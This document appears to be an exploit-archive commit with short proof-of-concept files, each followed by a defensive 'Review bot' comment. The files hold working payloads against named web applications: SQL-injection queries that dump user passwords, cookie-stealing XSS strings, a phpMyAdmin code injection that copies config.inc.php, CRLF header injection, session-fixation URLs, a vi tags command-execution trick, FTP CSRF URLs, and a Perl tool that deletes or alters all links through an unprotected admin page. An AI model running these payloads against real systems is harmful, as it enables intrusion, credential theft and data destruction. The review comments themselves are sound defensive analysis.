OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001
###########################################################################################################
###########################################################################################################
###########################################################################################################
# Multiple CRLF injection / HTTP response splitting #######################################################
Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to
enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability
that theoretically can be used to poison cache, gain unauthorized access to a user account or collect
sensitive information of this user.
A possible exploit by passing such a mal-formed URI could lead to:
- return of a blank page or a PHP error (depending on one's server configuration)
- set unsolicited browser cookies
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE:
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002
Vulnerability details:
###########################################################################################################
# 1 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: anid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=start
&aid=1
&am=1
&anid=%0d%0a%20[INJECT:INJECT]
&cl=start
&fnc=tobasket
&lang=0
&pgNr=0
&stoken=1
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 2 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: cnid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=%0d%0a%20[INJECTED:INJECTED]
&fnc=tobasket
&lang=0
&listtype=list
&panid=
&parentid=1
&stoken=1
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 3 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: listtype
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=0
&fnc=tobasket
&lang=0
&listtype=%0d%0a%20[INJECTED:INJECTED]
&panid=
&parentid=0
&stoken=0
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners.
A thanks to the developers who have responded relatively quickly.
Cheers!
//sToRm
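Review bot: the placeholder for the injection point is inconsistent across the three entries: entry 1's CONCEPT uses `[INJECT:INJECT]`, entries 2 and 3 use `[INJECTED:INJECTED]`, and all three SAMPLE lines use `INJECTED:INJECTED_DATA`; one spelling would let a reader line up CONCEPT and SAMPLE. None of the entries names the response header into which `anid`, `cnid` and `listtype` are copied, which is what a maintainer needs to find the sink; the `%0d%0a` in each CONCEPT only shows that the value reaches a header without CR/LF being rejected, so the fix belongs at that header write, not at the parameter.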


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31188/info
phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
This issue affects versions prior to phpMyAdmin 2.11.9.1.
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
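Review bot: the PoC carries `token=[valid token]`, so this is a post-authentication issue that only works from a session already holding a valid phpMyAdmin token; the description above should state that precondition instead of the generic "attackers can leverage". The `sort_by` value closes a string and an array index (`"])`) before the `exec(` call and ends with `//`, which shows the parameter is being spliced into PHP source rather than into a query; that is the sink a patch review should look at.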


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31210/info
Quick.Cms.Lite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Quick.Cms.Lite 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?"><script>alert(document.cookie)</script><"
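Review bot: the payload sits directly after `?` with no parameter name, so the entry never identifies what reflects it (a named query key or a server variable such as the request URI). Without that, a maintainer cannot tell which output to encode; the description should name the reflecting source.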


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31214/info
The Cars & Vehicle script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
www.example.com/Script/page.php?lnkid=-1/**/UNION/**/SELECT/**/1,1,1,1,concat_ws(user(),version(),database()),1/*
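Review bot: this file has no affected-version line, unlike the neighbouring entries ("X is vulnerable; other versions may also be affected"), and the PoC URL lacks a scheme. The injected parameter is `lnkid`, which should be stated in the description; the remediation for this entry is a parameterised query for that value, as for the other SQL-injection files in this commit.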


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31216/info
Quick.Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Quick.Cart 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?"><script>alert(document.cookie)</script><"
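Review bot: the PoC is byte-for-byte the same `admin.php?"><script>...` string as the Quick.Cms.Lite entry, and again no parameter name is given. If the two products share an admin front end the entry should say so; either way it should identify the reflecting source so the two files are not just duplicates of one another.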

platforms/php/webapps/32392.pl Executable file

@ -0,0 +1,256 @@
source: http://www.securityfocus.com/bid/31228/info
Add a link is prone to multiple security vulnerabilities, including multiple security-bypass issues and an SQL-injection issue.
Exploiting the security-bypass issues may allow an attacker to bypass certain security restrictions and perform unauthorized actions. The attacker can exploit the SQL-injection issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. This will compromise the application and may aid in further attacks.
These issues affect Add a link 4 and prior versions.
# addalink <= 4 Arbitrary Admin Access Vulnerability Exploit
# url: http://sourceforge.net/projects/addalink/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
print "Insert host/path:(ex: http://www.site.com/linkliste/)\n";
$host=<STDIN>;
chomp $host;
print "\n";
# Si la url no tiene http: al principio
if ( $host !~ /^http:/ ) {
# lo añadimos
$host = 'http://' . $host;
}
# Si la url no tiene / al final
if ( $host !~ /\/$/ ) {
# lo añadimos
$host = $host . '/';
}
print " Victim: $host \n\n";
menu:;
print "Menu:\n";
print "\n";
print "1. Reset all counters\n";
print "2. Delete all links\n";
print "3. Approve all links\n";
print "4. Unapprove all links\n";
print "";
print "5. Exit\n\n";
print "Option:";
$opcion=<STDIN>;
if ($opcion>=1 && $opcion<=5 )
{
if ($opcion==1)
{
&Reset_all_counters
}
if ($opcion==2)
{
&Delete_all_links
}
if ($opcion==3)
{
&Approve_all_links
}
if ($opcion==4)
{
&Unapprove_all_links
}
if ($opcion==5)
{
exit(1);
}}
else
{
print "Option incorrect\n";
goto menu;
}
####
sub Reset_all_counters
{
$poc="admin/read_links.php?action=resetcounter";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Reset all counters\n\n";
}
else {
print "[-] Reset all counters\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
###
sub Delete_all_links
{
$poc="admin/read_links.php?action=deleteall";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Delete all links\n\n";
}
else {
print "[-] Delete all links\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
###
sub Approve_all_links
{
$poc="admin/read_links.php?action=approveall";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Approve all links\n\n";
}
else {
print "[-] Approve all links\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
###
sub Unapprove_all_links
{
$poc="admin/read_links.php?action=unapproveall";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Unapprove all links\n\n";
}
else {
print "[-] Unapprove all links\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
# __EOF__
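Review bot: each subroutine prints `[+]` on `$response->is_success`, i.e. any 2xx reply, which a login page or an error page served with 200 also satisfies, so the script reports success without any evidence that the action ran; the header comment should say the status line is not a confirmation. The `#!/usr/bin/perl` line sits after the comment block rather than on line 1, where the kernel will not see it, so the file is not directly executable as committed, and `goto menu` out of a subroutine plus the absence of `use strict` are the style points a Perl reviewer would flag. From the application side, each request is a plain GET to `admin/read_links.php?action=...` with no cookie or credential, which is the authorization gap the description calls a security bypass: every `action` branch in that script needs the same admin check as the rest of `admin/`.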


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31249/info
HyperStop WebHost Directory is reported prone to an information-disclosure vulnerability.
Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database.
HyperStop WebHost Directory 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin/backup/db
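Review bot: the PoC is a bare path, `/admin/backup/db`, with no parameter, so the issue is an unauthenticated download of a backup artifact that lives under the web root inside `admin/`. The description says "full contents of the application's database" but not whether the file is generated on request or left on disk, which decides whether the fix is access control on `admin/`, storing backups outside the document root, or both; the entry should state it.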

platforms/php/webapps/32396.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31256/info
H-Sphere is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
H-Sphere 3.0.0 Patch 9 and 3.1 Patch 1 are vulnerable; other versions may also be affected.
http://www.example.com/webshell4/login.php?err=[XSS]
http://www.example.com/webshell4/login.php?login=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31263/info
PHP Pro Bid is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Pro Bid 6.04 is vulnerable; other versions may also be affected.
http://www.example.com/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20
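Review bot: the injection point is `order_field=(select 1)x` with `order_type=%20`, i.e. the ORDER BY column and direction. Those positions cannot be bound with query placeholders, so the usual "use prepared statements" advice does not cover this entry; the fix a maintainer needs is an allowlist that maps `order_field` and `order_type` onto fixed column names and `ASC`/`DESC`. The description should say the injection is in ORDER BY, since that changes the remediation.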


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31287/info
Thyme is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Thyme 1.3; other versions may also be affected.
http://www.example.com/thyme/modules/common_files/add_calendars.php?callback="/></SCRIPT></FORM><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT><FORM>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31301/info
UNAK-CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
javascript:document.cookie = "unak_lang=1; path=/";
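Review bot: the PoC sets a cookie named `unak_lang` to `1`, and nothing in the entry explains how a language cookie feeds the authentication decision, so the sink is undocumented; state which check reads `unak_lang` and what the value `1` selects. Cookie contents are client-controlled input, so the fix is to take the authorization decision from server-side session state rather than from a cookie value.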


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31304/info
MapCal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MapCal 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31306/info
fuzzylime (cms) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to fuzzylime (cms) 3.03 are vulnerable.
<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form>
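Review bot: the form markup has `name="user"value='...'` with no space between the two attributes, and `type=submit` is unquoted; browsers recover from both, but a PoC that gets copied into a test harness should be well-formed. The entry identifies the POST parameter `user` sent to `admin/usercheck.php` with `log=in` but not where that value is echoed back; naming the echo point is what the maintainer needs to apply output encoding.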


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31313/info
xt:Commerce is prone to multiple vulnerabilities, including a session-fixation vulnerability and a cross-site scripting vulnerability.
An attacker can leverage the session-fixation issue to hijack a session of an unsuspecting user. The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
xt:Commerce 3.04 is vulnerable; other versions may also be affected.
https://www.example.com/advanced_search_result.php?keywords=/>"<script>alert(15)</script>&x=1&y=1


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31313/info
xt:Commerce is prone to multiple vulnerabilities, including a session-fixation vulnerability and a cross-site scripting vulnerability.
An attacker can leverage the session-fixation issue to hijack a session of an unsuspecting user. The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
xt:Commerce 3.04 is vulnerable; other versions may also be affected.
https://www.example.com/xtcommerce304/shopping_cart.php/XTCsid/15031988
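Review bot: the description in this file is a verbatim copy of the previous xt:Commerce entry (same BID 31313), including the cross-site scripting paragraph, while the PoC here is only the session-fixation vector `shopping_cart.php/XTCsid/15031988`; trim the text to what this file demonstrates. The vector shows a session id being accepted from the URL path, so the fix is to stop honouring `XTCsid` from the path or query string and to regenerate the session id at login.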


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31315/info
BLUEPAGE CMS is prone to a session-fixation vulnerability.
Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
BLUEPAGE CMS 2.5 is vulnerable; other versions may also be affected.
http://www.example.com/BluePageCMS/?PHPSESSID=15031988
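Review bot: `?PHPSESSID=15031988` is PHP's default session name supplied through the query string, so this entry concerns the PHP runtime configuration as much as the CMS: with `session.use_only_cookies=1` (and `session.use_trans_sid=0`) the runtime ignores a URL-supplied id, and the application still needs `session_regenerate_id()` after a successful login so a pre-set id is never promoted to an authenticated session. The description should name those two controls.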


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31323/info
BlueCUBE CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/tienda.php?id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/*


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31326/info
Achievo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Achievo 1.3.2; other versions may also be affected.
http://www.example.com/achievo-1.3.2/dispatch.php?atknodetype= >"><script%20%0a%0d>a lert(document.cookie)%3B</script>&atkaction=adminpim&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82
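Review bot: the PoC URL embeds `achievo=cgvuu4c9nv45ofdq8ntv1inm82`, which reads as a session id captured from the reporter's own session rather than a value relevant to the finding; other entries in this commit use placeholders such as `[valid token]`, and this one should too. The injected parameter is `atknodetype`, which the description should state.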


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31329/info
6rbScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31335/info
Datalife Engine CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Datalife Engine CMS 7.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3E


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31350/info
InterTech Web Content Management System (WCMS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--

platforms/php/webapps/32415.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31384/info
The Ajax Checklist module for Drupal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect versions prior to Ajax Checklist 5.x-1.1.
http://www.example.com/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20f
rom%20users%20where%20uid=1),3),(4,4,%274/3/4
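Review bot: the PoC URL is wrapped mid-token across the last two lines (`f` / `rom`), so the file as committed is not the single-line request the description implies; entries like this should stay on one line. The path-based `save/1/2'` shows the checklist id and value are taken from URL segments and concatenated into an INSERT (the payload closes one VALUES tuple with `2),(3,3,...` and opens more), so the maintainer-side fix is Drupal's `db_query()` placeholder arguments (`%d` for the integer segments) for every segment rather than string building.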


@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/31229/info
Sun Solaris text editors are prone to a command-execution vulnerability.
An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer.
Sun Solaris 8, 9, and 10 are affected.
$ echo "This is line 1" > file1
$ echo "file1line1<TAB>file1<TAB>:1|!touch gotcha" > tags
$ ls
file1 tags
$ vi -t file1line1
:q!
$ ls
file1 gotcha tags
$
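Review bot: the transcript demonstrates the command running as the invoking user (`touch gotcha` lands in the same directory, run from the same `$` prompt), while the description claims execution "with the privileges of another user"; the cross-user case needs a second user to run `vi -t` where the attacker controls the `tags` file, and that precondition should be written down. The mechanism is that the third field of a tags entry is an ex command executed verbatim, so `:1|!touch gotcha` spawns a shell; an editor hardened against this accepts only a line number or a search pattern in that field.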

platforms/unix/remote/32399.txt Executable file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/31289/info
FTP servers by multiple vendors are prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks.
Successful exploits can run arbitrary FTP commands on the server in the context of an unsuspecting user's session. This may lead to further attacks.
ftp://user@example.com////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////syst
ftp://ftp.example.com/////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE
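Review bot: the two URLs differ only in the final segment (`syst` versus `SITE%20CHMOD%20777%20EXAMPLEFILE`) and in whether a `user@` is present, and the description never explains what the long run of slashes does, which is exactly the detail a defender needs to write a detection rule; state it. The description attributes the flaw to "FTP servers by multiple vendors", yet the PoC is two `ftp://` URLs meant to be opened by a victim's browser, so the entry should also say which side (client URL handling or server command parsing) the fix belongs to.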